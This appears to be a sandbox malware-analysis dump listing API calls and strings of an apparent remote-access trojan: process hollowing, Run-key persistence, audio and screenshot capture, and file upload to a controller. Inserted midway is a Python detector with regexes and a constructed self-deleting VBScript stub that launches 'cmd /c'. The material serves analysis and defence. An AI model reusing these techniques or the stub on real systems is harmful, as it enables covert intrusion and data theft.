                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                              • ResumeThread.KERNEL32(?), ref: 00418470
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                              • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                              • GetLastError.KERNEL32 ref: 004184B5
                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                              • API String ID: 4188446516-3035715614
                                              • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                              • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                              • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                              • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                              APIs
                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,8)[,004752F0,?,pth_unenc), ref: 0040B8F6
                                                • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                              • ExitProcess.KERNEL32 ref: 0040D454
                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                              • String ID: ")$.vbs$0C[$8)[$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xdF$xpF
                                              • API String ID: 3797177996-628613161
                                              • Opcode ID: dd8319ffc67d1054beefb8b0b566d77839d74a362affede773f697cf057b9661
                                              • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                              • Opcode Fuzzy Hash: dd8319ffc67d1054beefb8b0b566d77839d74a362affede773f697cf057b9661
                                              • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                              • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                              • CloseHandle.KERNEL32(00000000), ref: 00412576
                                              • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                              • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                              • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                              • Sleep.KERNEL32(000001F4), ref: 004126BD
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                              • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                              • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                              • String ID: .exe$0C[$WDH$exepath$open$temp_
                                              • API String ID: 2649220323-3545883927
                                              • Opcode ID: 1c913ae08a5e17ca5ba38718309b211a0371373e46d4682c3eff5b2ddab4b42e
                                              • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                              • Opcode Fuzzy Hash: 1c913ae08a5e17ca5ba38718309b211a0371373e46d4682c3eff5b2ddab4b42e
                                              • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                              APIs
                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                              • SetEvent.KERNEL32 ref: 0041B2AA
                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                              • CloseHandle.KERNEL32 ref: 0041B2CB
                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                              • API String ID: 738084811-2094122233
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                              Similarity
                                              • API ID: File$Write$Create
                                              • String ID: RIFF$WAVE$data$fmt
                                              • API String ID: 1602526932-4212202414
                                              APIs
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000001,00407688,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000003,004076B0,8)[,00407709), ref: 004072BF
                                              • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                              • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                              • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                              • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                              • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                              • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                              • API String ID: 1646373207-1022880986
                                              Similarity
                                              • API ID: _free$EnvironmentVariable$_wcschr
                                              • String ID: `#[
                                              • API String ID: 3899193279-4119260463
                                              APIs
                                              • _wcslen.LIBCMT ref: 0040CE42
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                              • _wcslen.LIBCMT ref: 0040CF21
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000000,00000000), ref: 0040CFBF
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                              • _wcslen.LIBCMT ref: 0040D001
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                              • ExitProcess.KERNEL32 ref: 0040D09D
                                              Similarity
                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                              • String ID: 6$8)[$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$del$open$xdF
                                              • API String ID: 1579085052-658302313
                                              Similarity
                                              • API ID: _free$Info
                                              • String ID: v%(/
                                              • API String ID: 2509303402-2435473048
                                              APIs
                                              • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                              • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                              • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                              • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                              • _wcslen.LIBCMT ref: 0041C1CC
                                              • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                              • GetLastError.KERNEL32 ref: 0041C204
                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                              • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                              • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                              • GetLastError.KERNEL32 ref: 0041C261
                                              Similarity
                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                              • String ID: ?
                                              • API String ID: 3941738427-1684325040
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                              • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                              • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                              • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Similarity
                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                              • String ID: /stext "$,aF$0TG$0TG$NG$NG
                                              • API String ID: 1223786279-4119708859
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                              • __aulldiv.LIBCMT ref: 00408D88
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                              • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                              • CloseHandle.KERNEL32(00000000), ref: 00409037
                                              Similarity
                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $xdF$NG
                                              • API String ID: 3086580692-3944908133
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                              • GetCursorPos.USER32(?), ref: 0041D67A
                                              • SetForegroundWindow.USER32(?), ref: 0041D683
                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                              • ExitProcess.KERNEL32 ref: 0041D6F6
                                              • CreatePopupMenu.USER32 ref: 0041D6FC
                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                              Similarity
                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                              • String ID: Close
                                              • API String ID: 1657328048-3535843008
                                              APIs
                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                              • ExitProcess.KERNEL32 ref: 0040D9FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                              • String ID: """, 0$.vbs$0C[$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open$xdF
                                              • API String ID: 1913171305-66013450
                                              • Opcode ID: 8bbe4f0fb6c88a2abc4eeafe0384b11dbe09999f44ef1c7605111127e7698097
                                              • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                              • Opcode Fuzzy Hash: 8bbe4f0fb6c88a2abc4eeafe0384b11dbe09999f44ef1c7605111127e7698097
                                              • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
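The record above pairs ShellExecuteW("open") and ExitProcess with the string fragments `.vbs`, `Temp`, `exepath`, `""", 0`, `CreateObject("WScript.Shell").Run "cmd /c ""` and `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`: a VBScript stub is written to the temp directory, launched, and removes itself after running a cmd /c command. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it hunts a directory for .vbs files that carry both traits. The stub text it scans is constructed from the fragments on the page (the real script's exact layout and the path it runs are assumptions).

```python
"""Hunt a directory for self-deleting WScript launcher stubs.

Added example (not from the report or the sample). The two markers are
taken from the String ID line of the record above; the sample stub is
constructed from those fragments, its target path is an assumption.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Marker 1: WScript.Shell.Run "cmd /c ..." (the launcher half of the stub).
RUN_CMD = re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd\s*/c', re.I)
# Marker 2: FileSystemObject.DeleteFile(WScript.ScriptFullName) (self-delete).
SELF_DELETE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\('
    r'\s*W?Script\.ScriptFullName\s*\)',
    re.I,
)


def classify_vbs(text: str) -> list[str]:
    """Return the suspicious traits found in one VBScript body."""
    traits = []
    if RUN_CMD.search(text):
        traits.append("spawns cmd.exe via WScript.Shell")
    if SELF_DELETE.search(text):
        traits.append("deletes its own script file")
    return traits


def hunt_vbs(directory: str) -> dict[str, list[str]]:
    """Scan *directory* for .vbs files; report those showing BOTH traits.

    Requiring both keeps ordinary admin scripts (which rarely delete
    themselves) out of the result set.
    """
    hits: dict[str, list[str]] = {}
    for path in Path(directory).glob("*.vbs"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        traits = classify_vbs(text)
        if len(traits) == 2:
            hits[str(path)] = traits
    return hits


# Constructed stub assembled from the page's fragments ('""", 0' is the
# closing of a doubly-quoted path plus the hidden-window flag). The .exe
# path is an assumption for illustration only.
CONSTRUCTED_STUB = (
    'CreateObject("WScript.Shell").Run "cmd /c ""'
    'C:\\Users\\victim\\AppData\\Local\\Temp\\exepath.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject")'
    '.DeleteFile(Wscript.ScriptFullName)\r\n'
)
BENIGN_STUB = 'MsgBox "hello"\r\n'


def demo() -> dict[str, list[str]]:
    """Write one stub and one benign script to a temp dir and hunt it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "stub.vbs").write_text(CONSTRUCTED_STUB)
        Path(tmp, "benign.vbs").write_text(BENIGN_STUB)
        return {os.path.basename(k): v for k, v in hunt_vbs(tmp).items()}


if __name__ == "__main__":
    print(demo())
```

On a live host, point hunt_vbs at %TEMP% of each user profile; the stub is deleted by its own last line, so the window for catching it on disk is short and the more durable signal is the parent process chain (wscript.exe spawning cmd.exe) that the page's ShellExecuteW call implies.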
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                              • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                              • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                              • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                              • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                              • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                              • String ID: \ws2_32$\wship6$getaddrinfo
                                              • API String ID: 2490988753-3078833738
                                              • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                              • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                              • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                              • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                              • _free.LIBCMT ref: 0045137F
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 004513A1
                                              • _free.LIBCMT ref: 004513B6
                                              • _free.LIBCMT ref: 004513C1
                                              • _free.LIBCMT ref: 004513E3
                                              • _free.LIBCMT ref: 004513F6
                                              • _free.LIBCMT ref: 00451404
                                              • _free.LIBCMT ref: 0045140F
                                              • _free.LIBCMT ref: 00451447
                                              • _free.LIBCMT ref: 0045144E
                                              • _free.LIBCMT ref: 0045146B
                                              • _free.LIBCMT ref: 00451483
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                              • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                              • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0041A04A
                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                              • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                              • GetLocalTime.KERNEL32(?), ref: 0041A196
                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                              • API String ID: 489098229-1431523004
